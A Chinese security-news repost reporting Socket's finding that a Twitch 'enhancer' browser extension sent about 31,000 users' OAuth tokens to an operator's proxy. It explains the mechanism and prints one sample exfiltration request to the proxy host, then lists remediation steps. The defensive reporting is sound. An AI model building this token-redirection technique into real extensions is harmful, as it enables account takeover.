【安全圈】3万用户中招!恶意插件偷跑Twitch凭据直连俄罗斯代理

admin 2026-09-16 04:42:45 网络安全文章 来源:ZONE.CI 全球网 0 阅读模式

文章总结: 安全机构Socket预警,恶意浏览器扩展TwitchEnhancedViewer|JeetBot以画质增强为幌子,窃取约3万名用户TwitchOAuth凭据并明文外带至俄罗斯代理。插件含硬编码白名单规避10位俄语主播。专家强调仅卸载无效,用户需立即删除插件、吊销授权应用、重置密码并启用2FA,企业应通过策略管控终端插件。 综合评分: 85 文章分类: 恶意软件,应急响应,威胁情报,安全意识


【安全圈】3万用户中招!恶意插件偷跑Twitch凭据直连俄罗斯代理

安全圈

2026年9月14日 19:00 江苏

在小说阅读器读本章

去阅读

在公众号小说中沉浸阅读

关键词

恶意插件

⚠️ 安全机构 Socket 于 9 月 14 日发布突发预警:一款打着“画质增强、去除广告”旗号的知名跨平台浏览器扩展程序,被证实长期将近 31,000 名用户的 Twitch OAuth 承载凭证以明文重定向方式输送至俄罗斯商业代理集群。 攻击者无需受害者账号密码或双因子验证(2FA),即可直接接管其会话、窃听私信并操纵账号。

🎭 羊头狗肉:以“1080P解锁”为掩护的凭据劫持

该涉事扩展名为 “Twitch Enhanced Viewer | JeetBot”,长期在谷歌 Chrome Web Store 和火狐 Mozilla Firefox Add-Ons 官方应用商店公开发行。官方应用商店统计显示,Chrome 端受感染用户超过 30,000 人,Firefox 端则有数百名活跃用户。

该扩展宣称是面向主播与观众的专业辅助工具,能为网络受限地区提供 1080P 超清流媒体播放能力并免除贴片广告。但在暗地里,插件获取了极为宽泛的浏览器网络层拦截权限,在用户每次发起视频播放列表(usher.ttvnw.net)请求时,悄悄提取用户的有效登录凭据,将其拼接到外发 URL 的请求参数中。

🔍 偷梁换柱的技术实现机制

▪️ 动态注入与凭据窃取:插件内嵌脚本从当前网页环境中实时截获 Twitch Bearer OAuth Token。

▪️ URL 参数外带:在向 usher.ttvnw.net 拉取 m3u8 播放列表时,通过网络层 Redirect 将用户流量强行重路由至运营者自己的代理服务器,并将 Token 注入为 &auth=[OAuth_Token] 查询参数。

▪️ 代理日志明文沉淀:由于 OAuth 凭据以明文字符串出现在 GET 请求的 URL 参数中,中间代理服务器和反向代理网关的 Access Log 会将所有有效凭据全量持久化归档。

▪️ 历史版本更激进:研究员比对早期 v4.x 版本发现,该插件甚至曾直接使用 HTTP POST 方法将凭据打包回传至 deno.dev 和 deno.net 上的专用数据收集端点。

🕵️‍♂️ 诡异特征:硬编码白名单特意放过 10 位俄语主播

Socket 安全研究员 Kush Pandya 在反编译其 v85.x 核心代码逻辑时,抓取到了一处极具针对性的设计:该插件包含一个硬编码的豁免白名单,精准排除了 10 个特定的头部俄语主播频道。

当受害者浏览这 10 位主播的直播间时,插件会静默关闭凭证外带行为,避免引起来自这些特定社区或技术人员的逆向警觉;而一旦用户切换到其他任何全球频道,凭据外泄管道立即全速启动。

🛡️ 插件源码硬编码的“豁免偷窥”频道名单

▪️ akyuliych(110万粉丝)、pch3lk1n(58万粉丝)、fasoollka(36.1万粉丝)

▪️ lagoda1337(22.5万粉丝)、forzorezor(17.7万粉丝)、flamie(13.2万粉丝)

▪️ lagoda(7.7万粉丝)、dosiafanderalmazer

# 插件劫持播放流请求,将 Bearer Token 挂载在 URL 查询参数中GET /api/channel/hls/stream.m3u8?sig=...&auth=oauth:2gbxxxxxxxxxxxxxxxxxxxxxxx HTTP/1.1Host: proxy.jeetbot[.]ccUser-Agent: Mozilla/5.0 ...

⚡ 卸载根本不够!必须手动吊销已泄露授权

在事件被安全界公开后,JeetBot 运营者紧急修改了代码并在火狐上线了 85.8.7 修复版本。然而,安全专家严正提醒:单纯升级或卸载该浏览器插件完全无法消除风险!

OAuth Token 本质上是“无状态的持有者凭证”(Bearer Credential)。只要该令牌处于有效生命周期内,且没有在服务端主动发起撤销,黑客手上的历史日志就能继续畅通无阻地调用官方 API。持有者可以直接查阅受害者的私聊信箱(Whispers)、伪造受害者身份在公共聊天室发言或打赏,甚至擅自更改关联配置。

🛡️ 个人与企业用户止血方案

1️⃣ 即刻彻底删除插件:检查 Chrome 与 Firefox 插件清单,彻底移除 Twitch Enhanced Viewer | JeetBot(ID: pnhhdhhcadcjfckjhpmjneldiegbojfb)。

2️⃣ 全面注销已授权应用连接:登录 Twitch 官方后台,进入 Settings -> Connections(设置-连接与授权应用),将所有历史已授权的第三方应用与扩展连接全部点击 “Disconnect / 吊销连接”,强制使所有旧 Token 立即失效。

3️⃣ 强制重置密码并启用硬件 2FA:重置主账号登录密码以触发全平台强制登出机制,并绑定物理安全密钥或独立认证器 App。

4️⃣ 企业终端管控收紧:办公终端必须通过 Chrome Enterprise Policy(管理策略)统一禁用未受信任的第三方开发商插件,防范员工在研发机上因娱乐插件导致内网凭据旁路失窃。

END

阅读推荐

【安全圈】GitHub又崩了!PR重大中断全球研发停摆

【安全圈】洗衣机19小时传400MB流量!

【安全圈】微软9月补丁日!973个漏洞3个已在野利用

【安全圈】游戏资源站暗藏投毒!黑产盗号卖进暗网

【安全圈】黑客操纵数百个AI Agent:26秒破11家企业,夜袭440台服务器

安全圈

←扫码关注我们

网罗圈内热点 专注网络安全

实时资讯一手掌握!

好看你就分享 有用就点个赞

支持「安全圈」就点个三连吧!


免责声明:

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。

任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我

本文转载自:安全圈 《【安全圈】3万用户中招!恶意插件偷跑Twitch凭据直连俄罗斯代理》

本地文档搜索神器qmd 网络安全文章

本地文档搜索神器qmd

文章总结: qmd是一款基于TypeScript开发的开源本地文档搜索工具,GitHub近3万星,支持全本地运行、全格式兼容和语义级搜索,解决本地文件检索效率低
评论:0   参与:  0